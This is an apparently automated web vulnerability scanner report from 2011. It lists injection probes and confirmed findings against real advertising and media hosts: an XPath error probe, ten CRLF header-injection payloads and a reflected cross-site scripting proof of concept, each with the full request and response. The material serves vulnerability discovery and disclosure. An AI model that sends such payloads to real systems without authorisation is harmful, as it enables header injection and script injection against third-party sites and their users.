GET /imp?tid=17&ci=8c2b229d97e563c0)(sn=*&vn1=4.1.1&vn2=e4.0&ec=ISO-8859-1&cm_mmc=dir-_-banr-_-turn-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38488051&cm_mmca4=podr_flip_banner_blue_newlogo_728x90_f8_tag_1clicktag&cm_mmca5=728x90&cm_mmca6=ad_ntwk&cm_mmca7=turn_remark_podr_flip_banner_blue_newlogo_728x90_f8_tag_1clicktag&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=dpcm&cm_mmca12=dr&cm_mmca13=1&rand=37658442370594&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=70091303843240316067555; TestSess3=x

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:52:13 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 8c2b229d97e563c0)(sn=*_login=130434073301510620268c2b229d97e563c0)(sn=*; path=/
Set-Cookie: 8c2b229d97e563c0)(sn=*_reset=1304340733;path=/
Expires: Sun, 01 May 2011 18:52:13 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /imp?tid=17&ci=8c2b229d97e563c0)!(sn=*&vn1=4.1.1&vn2=e4.0&ec=ISO-8859-1&cm_mmc=dir-_-banr-_-turn-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38488051&cm_mmca4=podr_flip_banner_blue_newlogo_728x90_f8_tag_1clicktag&cm_mmca5=728x90&cm_mmca6=ad_ntwk&cm_mmca7=turn_remark_podr_flip_banner_blue_newlogo_728x90_f8_tag_1clicktag&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=dpcm&cm_mmca12=dr&cm_mmca13=1&rand=37658442370594&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=70091303843240316067555; TestSess3=x

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:52:13 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 8c2b229d97e563c0)!(sn=*_login=130434073301175075948c2b229d97e563c0)!(sn=*; path=/
Set-Cookie: 8c2b229d97e563c0)!(sn=*_reset=1304340733;path=/
Expires: Sun, 01 May 2011 18:52:13 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

4. XPath injection  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.patlive.com
Path:   /appointment-scheduling/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /appointment-scheduling'/ HTTP/1.1
Host: www.patlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 02 May 2011 15:05:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8950

<html>
<head>
<title>Expression must evaluate to a node-set.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p
...[SNIP]...
</b>System.Xml.XPath.XPathException: Expression must evaluate to a node-set.<br>
...[SNIP]...
<pre>

[XPathException: Expression must evaluate to a node-set.]
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeType) +3961158
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +77
MS.Internal.Xml.XPath.XPathParse
...[SNIP]...

5. HTTP header injection  previous  next
There are 10 instances of this issue:


5.1. http://ad.doubleclick.net/crossdomain.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 82519%0d%0a8220753ce5b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /crossdomain.xml82519%0d%0a8220753ce5b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2462067/PID_1583174_inpage.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/crossdomain.xml82519
8220753ce5b
:
Date: Mon, 02 May 2011 13:00:28 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

5.2. http://amch.questionmarket.com/adsc/d724925/18/725047/adscout.php [ES cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d724925/18/725047/adscout.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 46093%0d%0aba45031a507 was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d724925/18/725047/adscout.php?ord=4dbeaba3daa70 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://designers.glam.com/2011/04/29/royal-wedding-style-what-the-guests-wore/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-4_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1; ES=46093%0d%0aba45031a507

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 13:13:21 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a227.dl
Set-Cookie: CS1=deleted; expires=Sun, 02-May-2010 13:13:20 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-4_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-1; expires=Fri, 22-Jun-2012 05:13:21 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=46093
ba45031a507
_724925-*=''M-0; expires=Fri, 22-Jun-2012 05:13:21 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

5.3. http://amch.questionmarket.com/adsc/d724925/9/725047/adscout.php [ES cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d724925/9/725047/adscout.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload fd770%0d%0a517a9219aec was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d724925/9/725047/adscout.php?ord=4dbeac7db2be2 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/topic/?hideEditorial=1&searchTerm=Westminster+Abbey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-4_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-1; ES=fd770%0d%0a517a9219aec

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 13:51:18 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Sun, 02-May-2010 13:51:17 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-4_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-1_725047-9-1; expires=Fri, 22-Jun-2012 05:51:18 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=fd770
517a9219aec
_724925-|D('M-0; expires=Fri, 22-Jun-2012 05:51:18 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

5.4. http://bidder.mathtag.com/iframe/notify [exch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload d49c0%0d%0a33877e5090a was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /iframe/notify?exch=d49c0%0d%0a33877e5090a&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNTc1OTM3MjIxNzMyMzAxNDkvMTE1MDAzLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVG1CakFyMmVCVkhqT1lVd29YYV9SNTAv/bkSgJJWtYyLr6MfnqzzkMJWgIEo&price=Tb7HRQABokUK7FpOI0VITLWGsnTlT7R7SBUAfg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBazKnRce-TcXEBs60sQfMkJWaAtzvj_EB5PW9vBHImoSTEgAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi04MTU3MDAxNDA3NDE3Mjk4oAHg6pnsA7IBEXd3dy5vcmJpdGNhc3QuY29tugEJNzI4eDkwX2FzyAEJ2gEmaHR0cDovL3d3dy5vcmJpdGNhc3QuY29tL2FyY2hpdmVzLmh0bWyYAtAPwAIEyALWwYwOqAMB6APXAegDTvUDBAAAxIAGqcqGqrbH1Jtb%26num%3D1%26sig%3DAGiWqtyta5N-nE1sh-4x-VE0N704RIsesQ%26client%3Dca-pub-8157001407417298%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ts=1304340485; mt_mop=4:1304340485

Response

HTTP/1.1 404 Not found
Date: Mon, 02 May 2011 15:01:52 GMT
Server: MMBD/3.5.3
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - d49c0
33877e5090a

x-mm-host: ewr-bidder-x2
Connection: keep-alive

Request not found

5.5. http://clickserve.cc-dt.com/link/tplimage [lid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clickserve.cc-dt.com
Path:   /link/tplimage

Issue detail

The value of the lid request parameter is copied into the Location response header. The payload 9cbce%0d%0a676b5b556a6 was submitted in the lid parameter. This caused a response containing an injected HTTP header.

Request

GET /link/tplimage?lid=9cbce%0d%0a676b5b556a6&pubid=21000000000176230 HTTP/1.1
Host: clickserve.cc-dt.com
Proxy-Connection: keep-alive
Referer: http://www30a2.glam.com/gad/glamadapt_srv.act?;ga_output=html;ga_exadvids=50000417,50001916,2457154;ga_exadids=5000019254;_ge_=6^2^8e20d085342adacae9cc80362f9e8842;ga_adb=ade;sid=116391130334874196611;browser=2;co=US;dma=511;;;;flg=72;;zone=/;nt=g;cc=us;ec=ron;p=0;p=1;!c=m;!c=sf;cl=050168;cl=051194;ec=tb;ec=tf;pec=f;vec=st;vpec=st;qc=D;qc=T;qc=5150;qc=3726;qc=2951;qc=2705;qc=2698;qc=2696;qc=2693;qc=2692;qc=2690;qc=1988;qc=1902;atf=u;pfl=0;dt=s;!c=hagl;!c=hagn;art=232152_f8f;pt=0;afid=356541251;dsid=695190;;tt=i;u=b023179zhfv1qn3jidi,f0fu2sa,g100020;sz=728x90;tile=1;ord=7226277049630880;;afid=356541251;dsid=695190;url=s0a4ra;seq=1;ux=f-fu2sa,tid-1,pid-79zhfv1qn3jidi,aid-3,i-1,g-72,1,;_glt=300:1:13:4:30:761:2011:5:2;a_tz=-300;_g_cv=2;;;dsid=695190;nt=g;cc=us;ec=ron;p=0;p=1;!c=m;!c=sf;cl=050168;cl=051194;ec=tb;ec=tf;ia=mf;pec=f;rmt=exp;vec=st;vpec=st;;dt=s;!c=hagl;!c=hagn;;lbt=nbt;sbt=bc;sbt=fa;sbt=b;sbt=ec;sbt=lf;sbt=lh;sbt=lhe;sbt=f;sbt=s;sbt=fc;sbt=fp;sbt=bcb;sbt=bcf;sbt=bh;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 13:29:00 GMT
Server: Apache/1.3.41 (Unix)
Location: http://gan.doubleclick.net/gan_impression?lid=9cbce
676b5b556a6
&pubid=21000000000176230
Content-Type: text/html; charset=iso-8859-1
Expires: Mon, 02 May 2011 13:29:00 GMT
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://gan.doubleclick.net/gan_impression?lid=9cbc
...[SNIP]...

5.6. http://clickserve.cc-dt.com/link/tplimage [pubid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clickserve.cc-dt.com
Path:   /link/tplimage

Issue detail

The value of the pubid request parameter is copied into the Location response header. The payload 391ec%0d%0a7c35b386e75 was submitted in the pubid parameter. This caused a response containing an injected HTTP header.

Request

GET /link/tplimage?lid=41000000027557560&pubid=391ec%0d%0a7c35b386e75 HTTP/1.1
Host: clickserve.cc-dt.com
Proxy-Connection: keep-alive
Referer: http://www30a2.glam.com/gad/glamadapt_srv.act?;ga_output=html;ga_exadvids=50000417,50001916,2457154;ga_exadids=5000019254;_ge_=6^2^8e20d085342adacae9cc80362f9e8842;ga_adb=ade;sid=116391130334874196611;browser=2;co=US;dma=511;;;;flg=72;;zone=/;nt=g;cc=us;ec=ron;p=0;p=1;!c=m;!c=sf;cl=050168;cl=051194;ec=tb;ec=tf;pec=f;vec=st;vpec=st;qc=D;qc=T;qc=5150;qc=3726;qc=2951;qc=2705;qc=2698;qc=2696;qc=2693;qc=2692;qc=2690;qc=1988;qc=1902;atf=u;pfl=0;dt=s;!c=hagl;!c=hagn;art=232152_f8f;pt=0;afid=356541251;dsid=695190;;tt=i;u=b023179zhfv1qn3jidi,f0fu2sa,g100020;sz=728x90;tile=1;ord=7226277049630880;;afid=356541251;dsid=695190;url=s0a4ra;seq=1;ux=f-fu2sa,tid-1,pid-79zhfv1qn3jidi,aid-3,i-1,g-72,1,;_glt=300:1:13:4:30:761:2011:5:2;a_tz=-300;_g_cv=2;;;dsid=695190;nt=g;cc=us;ec=ron;p=0;p=1;!c=m;!c=sf;cl=050168;cl=051194;ec=tb;ec=tf;ia=mf;pec=f;rmt=exp;vec=st;vpec=st;;dt=s;!c=hagl;!c=hagn;;lbt=nbt;sbt=bc;sbt=fa;sbt=b;sbt=ec;sbt=lf;sbt=lh;sbt=lhe;sbt=f;sbt=s;sbt=fc;sbt=fp;sbt=bcb;sbt=bcf;sbt=bh;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 13:29:08 GMT
Server: Apache/1.3.41 (Unix)
Location: http://gan.doubleclick.net/gan_impression?lid=41000000027557560&pubid=391ec
7c35b386e75

Cneonction: close
Content-Type: text/html; charset=iso-8859-1
Expires: Mon, 02 May 2011 13:29:08 GMT
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://gan.doubleclick.net/gan_impression?lid=4100
...[SNIP]...

5.7. http://rd.apmebf.com/w/get.media [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rd.apmebf.com
Path:   /w/get.media

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1594f%0d%0ad8816df24f9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1594f%0d%0ad8816df24f9/get.media?sid=53962&tp=5&d=j&t=n&host=media.fastclick.net HTTP/1.1
Host: rd.apmebf.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/news/western-australia/christmas-island-kill-accused-lashed-out-with-knife/story-e6frg13u-1226046333217
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=g14vo-36788-1303134591742-0g; LCLK=cjo!w6qx-s1wdo9y

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 12:49:04 GMT
Server: Apache/2.2.4 (Unix)
Set-Cookie: S=g14vo-36788-1303134591742-0g; domain=.apmebf.com; path=/; expires=Wed, 01-May-2013 12:49:04 GMT
Location: http://media.fastclick.net/1594f
d8816df24f9
/get.media?sid=53962&tp=5&d=j&t=n&no_cj_c=0&upsid=822523287793
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 311
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://media.fastclick.net/1594f
d8816df24f9/g
...[SNIP]...

5.8. http://rd.apmebf.com/w/get.media [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rd.apmebf.com
Path:   /w/get.media

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9f542%0d%0a08d857cb4c0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /w/9f542%0d%0a08d857cb4c0?sid=53962&tp=5&d=j&t=n&host=media.fastclick.net HTTP/1.1
Host: rd.apmebf.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/news/western-australia/christmas-island-kill-accused-lashed-out-with-knife/story-e6frg13u-1226046333217
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=g14vo-36788-1303134591742-0g; LCLK=cjo!w6qx-s1wdo9y

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 12:49:06 GMT
Server: Apache/2.2.4 (Unix)
Set-Cookie: S=g14vo-36788-1303134591742-0g; domain=.apmebf.com; path=/; expires=Wed, 01-May-2013 12:49:06 GMT
Location: http://media.fastclick.net/w/9f542
08d857cb4c0
?sid=53962&tp=5&d=j&t=n&no_cj_c=0&upsid=822523287793
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 303
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://media.fastclick.net/w/9f542
08d857cb4c0
...[SNIP]...

5.9. http://rd.apmebf.com/w/get.media [S cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rd.apmebf.com
Path:   /w/get.media

Issue detail

The value of the S cookie is copied into the Set-Cookie response header. The payload 5cdd4%0d%0af376d10c369 was submitted in the S cookie. This caused a response containing an injected HTTP header.

Request

GET /w/get.media?sid=53962&tp=5&d=j&t=n&host=media.fastclick.net HTTP/1.1
Host: rd.apmebf.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/news/western-australia/christmas-island-kill-accused-lashed-out-with-knife/story-e6frg13u-1226046333217
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=5cdd4%0d%0af376d10c369; LCLK=cjo!w6qx-s1wdo9y

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 12:48:58 GMT
Server: Apache/2.2.4 (Unix)
Set-Cookie: S=5cdd4
f376d10c369
; domain=.apmebf.com; path=/; expires=Wed, 01-May-2013 12:48:58 GMT
Location: http://media.fastclick.net/w/get.media?sid=53962&tp=5&d=j&t=n&no_cj_c=0&upsid=685045168926
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 294
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://media.fastclick.net/w/get.media?sid=5396
...[SNIP]...

5.10. http://www22.glam.com/cTagsImgCmd.act [gname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.glam.com
Path:   /cTagsImgCmd.act

Issue detail

The value of the gname request parameter is copied into the Set-Cookie response header. The payload 4d3ab%0d%0a9f9bde70083 was submitted in the gname parameter. This caused a response containing an injected HTTP header.

Request

GET /cTagsImgCmd.act?gtid=5000000440&gcmd=setc&gexpires=172800&gname=4d3ab%0d%0a9f9bde70083&gvalue=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902 HTTP/1.1
Host: www22.glam.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmb=234602824; __utmc=234602824; bkpix2=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://www35t.glam.com/jsadimp.gif?1^0^83646a252187d5dd806ea7087c4bc7cb^116391130334874196611^1^446224^/^1x1^5000000440^31230390^-1^-1^-1^-1^0^0^4251304341546423^p^^0^^US^511^0^0^0^WASHINGTON^0^0^0^0^^4d3ab
Set-Cookie: 4d3ab
9f9bde70083
=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; expires=Wed, 04 May 2011 13: 05:46 GMT; path=/; domain=.glam.com;
ETag: "662c9bddfc82c61ba8066514fc2b172e:1276888104"
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
Cache-Control: max-age=588
Date: Mon, 02 May 2011 13:05:46 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

6. Cross-site scripting (reflected)  previous  next
There are 478 instances of this issue:


6.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload fa2f0<script>alert(1)</script>b1f522a3374 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480fa2f0<script>alert(1)</script>b1f522a3374&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; SERVERID=s7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:50:00 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480fa2f0<script>alert(1)</script>b1f522a3374-SM=adver_05-02-2011-12-50-00; expires=Thu, 05-May-2011 12:50:00 GMT; path=/; domain=c3metrics.com
